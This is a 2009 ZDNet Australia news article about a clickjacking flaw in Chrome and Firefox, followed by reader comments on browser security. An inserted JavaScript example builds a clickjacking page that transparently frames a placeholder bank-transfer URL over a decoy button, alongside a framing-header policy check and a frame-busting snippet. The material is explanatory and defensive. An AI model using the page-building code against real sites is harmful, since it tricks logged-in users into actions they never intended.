
Flaw exposes Chrome, Firefox to clickjacking

Liam Tung ZDNet Australia | January 29, 2009 4:43 AM PST

Summary

Security researchers have discovered a vulnerability that exposes Google's Chrome browser and Firefox 3.0.5 to a clickjacking attack.
Security researchers have discovered a flaw affecting Google's Chrome browser that exposes it to clickjacking, where an attacker hijacks a browser's functions by tricking the user into clicking a control from another site that has been hidden, typically inside a transparent frame, beneath the decoy the user actually sees.

Google has acknowledged the flaw and is working towards a patch for Chrome versions 1.0.154.43 and earlier when running within Windows XP SP2 systems, according to SecNiche security researcher Aditya K Sood.

Sood disclosed the flaw on January 27 and has since posted a proof of concept on the Bugtraq vulnerability-disclosure forum. "Attackers can trick users into performing actions which the users never intended to do and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page," Sood said within the disclosure.

While Google is working on a fix, a spokesperson for the Australian arm of the company pointed out that clickjacking affected all browsers, not just Chrome.

"The [clickjacking] issue is tied to the way the web and web pages were designed to work, and there is no simple fix for any particular browser. We are working with other stakeholders to come up with a standardized long-term mitigation approach," they said.

However, chief executive of Australian security consultancy Novologica, Nishad Herath, told ZDNet.com.au that after running Sood's proof of concept he found that Internet Explorer 8 (release candidate 1 and beta 2 versions) and Opera 9.63 (the latest version) were not exposed to the flaw. But, like Chrome, Firefox 3.0.5 was exposed.

Google's security researchers had not found any attacks in the wild that exploited the specific vulnerability, said Google's spokesperson.

Clickjacking is a relatively new type of browser attack. It is closely related to cross-site request forgery (CSRF), where an attacker uses maliciously crafted HTML or JavaScript code to force a victim's web browser to send an HTTP request to a website of their choosing; in clickjacking, the request is triggered by the victim's own click on a page element they cannot see.

"Clickjacking means that any interaction you have with a website you're on, for example like clicking on a link, may not do what you expect it to do," said Herath.

"You may click on a link that looks like it's pointing to a picture on Flickr, but in reality, it might first direct you to a drive-by-download server that serves malware. These types of attacks can be used to make you interact with web services you're already logged on to in ways that you would never want to, without you even knowing that it has happened."
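The two halves of the attack described above, as an added example that is not part of the ZDNet article or of Sood's Bugtraq proof of concept: the attacker's page, which frames the site the victim is logged in to and makes the frame transparent over a decoy control, and the header check that decides whether a target site may be framed at all. The header-based policy (X-Frame-Options, later the CSP frame-ancestors directive) is the "standardized long-term mitigation" that followed this period; the target URL, origins, decoy text and pixel offsets below are made-up placeholders.

```javascript
// Added example, not code from the article or from the disclosed proof of concept.
// All URLs, origins and offsets are invented for illustration.

const FRAME_OPACITY = 0; // fully transparent, but the frame still receives the click

// 1. Attacker page: a harmless-looking decoy button with the real target framed
//    on top of it. The negative offsets are an assumption about where the
//    sensitive button sits inside the framed page; an attacker tunes them so
//    that button lands exactly over the decoy.
function buildClickjackPage(targetUrl, decoyLabel) {
  return [
    '<!doctype html><html><body>',
    '<div style="position:relative;width:200px;height:40px;overflow:hidden">',
    `  <button style="position:absolute;top:0;left:0;width:200px;height:40px">${decoyLabel}</button>`,
    `  <iframe src="${targetUrl}" scrolling="no"`,
    `    style="position:absolute;top:-120px;left:-300px;width:800px;height:600px;` +
      `opacity:${FRAME_OPACITY};z-index:2;border:0"></iframe>`,
    '</div></body></html>',
  ].join('\n');
}

// 2. Framing policy check, as a browser or a server-side scanner would apply it.
//    A CSP frame-ancestors directive takes precedence over X-Frame-Options; with
//    neither present, any origin may frame the response, which is the state the
//    article's proof of concept relies on. Source matching is simplified to
//    exact origin strings, '*', 'self' and 'none'; any other X-Frame-Options
//    value (including the non-standard ALLOW-FROM) is treated as no policy here.
function framingAllowed(headers, frameOrigin, targetOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp
      .split(';')
      .map((s) => s.trim())
      .find((s) => s.startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      if (sources.includes("'none'")) return false;
      if (sources.includes("'self'") && frameOrigin === targetOrigin) return true;
      return sources.some((src) => src === '*' || src === frameOrigin);
    }
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return frameOrigin === targetOrigin;
  return true; // no recognised framing policy
}

// 3. The page-side defence of the period, a "frame-busting" script, kept here for
//    comparison. It only runs if the framed page's script executes, and known
//    bypasses exist, which is why the header-based policy above replaced it.
const FRAME_BUSTER = 'if (top !== self) { top.location = self.location; }';

// Constructed sample: a logged-in target that sends no framing policy at all.
function demo() {
  const target = 'https://bank.example/transfer?to=attacker&amount=1000';
  const page = buildClickjackPage(target, 'Play video');
  const noPolicy = framingAllowed({ 'Content-Type': 'text/html' }, 'https://evil.example', 'https://bank.example');
  const denied = framingAllowed({ 'X-Frame-Options': 'DENY' }, 'https://evil.example', 'https://bank.example');
  return { pageLength: page.length, noPolicy, denied, buster: FRAME_BUSTER };
}
```

Running `demo()` returns `noPolicy: true` and `denied: false`: the same attacker page that works against a site with no framing policy does nothing once the site answers with `X-Frame-Options: DENY`, because the browser refuses to render the frame.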

Credit: Chrome, Firefox get clickjacked was originally published on ZDNet Australia.

Talkback (most recent of 20)

  • Stonewalling over IE???
    How about the flaw in IE 6? IE 7?? After all, most users would be on one of those...not IE 8. LOVE how the headline leaves IE out and focuses on Chrome and Firefox.
    techboy_z
    29th Jan 2009
  • True but...
    True, but it is a reminder of the effort Microsoft has put into IE to preemptively protect the new browser from this type of exploit.

    It is about time IE hasn't been caught with its pants down.
    mikefarinha
    29th Jan 2009
  • That's besides techboy's point...
    True, but it is a reminder of the effort Microsoft has put into IE to preemptively protect the new browser from this type of exploit.

    Who the hell's running IE8 as opposed to IE6? Your response means nothing.
    hasta la Vista, bah-bie
    30th Jan 2009
  • Nairaine Isn't the Brightest Techie!
    But he knows who pays the bills and adds a sugar to the back pocket payola at Christmas time! haha

    Apply some semantics, throw in some mis-direction and he keeps a smile on Steve Monkey Boy's face, as he dances! :P
    i2fun@...
    30th Jan 2009
  • Whoa!
    Microsoft actually on top of security issues before everybody else? Wow. It must be cold downstairs.
    bardbard
    29th Jan 2009
  • IE does the same thing...
    Not to mention that the VAST majority of malware is COMPLETELY preventable on Windows and ANY BROWSER if you:

    1. Firewall
    2. Patch
    3. Don't run as Admin all the time

    It's that simple.
    Heatlesssun1
    29th Jan 2009
  • Wrong
    Your advice is out of date. Seriously so. Firewall and patch do nothing to defend against XSS and clickjacking, since the browser is working as intended: it interprets the Javascript/Flash.

    You need additional security tools now. You need at LEAST an anti-spyware utility in addition to your anti-virus, AND for true security, NoScript under Firefox.
    mejohnsn
    29th Jan 2009
  • You are correct however...
    A lot of these attacks are meant deliver a malware payload, so my advice still applies.

    As for anti-virus software, you really don't need an active virus scanner if you have good habits. I surf all the places I like with IE in Vista and have never been attacked. I do run passive scans weekly to make sure I'm ok. Anti-spyware tools are good to have actively running.

    Heatlesssun1
    29th Jan 2009
  • Javascript is so required for the web
    You can't do much without javascript as most sites use it unless they use flash which gives a horrible startup experience.....
    So why do all these people suggest turning off js? Do they not use the web much?
    tom@...
    30th Jan 2009
  • Not COMPLETELY
    You should patch software so it's up to date, and definitely use a firewall and antivirus. But even if you do this and use a non-admin account, there's still the PEBKAC factor. It comes down to the user (on any OS, any browser). Don't visit shady sites, don't install software from untrusted sources, don't open unsolicited email attachments and don't just click the 'OK' button on any pop-ups you get without understanding what you're doing. Oh, and don't enable auto-run on Windows and don't open USB thumb drives or flash memory cards without scanning with your antivirus app. The list goes on. The firewall+antivirus+patches+no-admin will reduce the likelihood of malware infection by perhaps 40-50%. The rest is up to the user.

    PS: "IE does the same thing"
    No it doesn't. You can disable Javascript for selected sites, or disable it completely and add exceptions. I don't recall if it gives you the option of blocking XSS, which is where the risk really lies.
    That's not the same as what NoScript does. You have to use it to get an idea of how much better it is than the IE way. In addition, NoScript also blocks flash, XSS and iFrames, thus effectively almost eliminating the risk of clickjacking. It is possible to get infected with NoScript, if you disable it or allow untrusted sites to run Javascript. Again, clueless users = biggest malware risk.
    balaknair
    29th Jan 2009
  • NoScript is good...
    but your jibe about "clueless users" is really unfair. In fact, it is that unfairness that is the real obstacle to educating the users how to use great tools like NoScript.

    After all: in its default configuration, it certainly is secure, but it gives little or no guidance for deciding which sites to allow. And since risky technologies like Javascript and Flash are overused and misused by web authors, the poor user is confronted with the responsibility for the decision, but deprived of the information needed to make it.

    That is why I say: it is not "clueless users" who are the problem, it is clueless or irresponsible web authors who are the problem.
    mejohnsn
    29th Jan 2009
  • Rampant cluelessness...
    That is why I say: it is not "clueless users" who are the problem, it is clueless or irresponsible web authors who are the problem.

    I'd have to say it's a combination of both clueless users and clueless web authors/admins that likely cause 90% of the problems...

    As a slightly OT aside.. WTF happened to ZDNet's log in mechanism today?
    Wolfie2K3
    30th Jan 2009
  • Not completely again...
    In IE8 you have XSS filtering: http://news.softpedia.com/news/IE8-XSS-Filter-Under-the-Hood-92220.shtml

    Of course there's debate on how effective it will be.

    Also, if you turn off scripting altogether, how can a cross site scripting attack do anything?

    And a great IE add on IEPro blocks ads and Flash among a lot of other things: http://www.ie7pro.com/

    And there's this:
    Heatlesssun1
    29th Jan 2009
  • Google owns the web, they'll keep any published exploits unpublished
    don't they just flip a switch over at Google and turn off any webpage/site that is malware, why not their shiny browser happy
    Boot_Agnostic
    29th Jan 2009
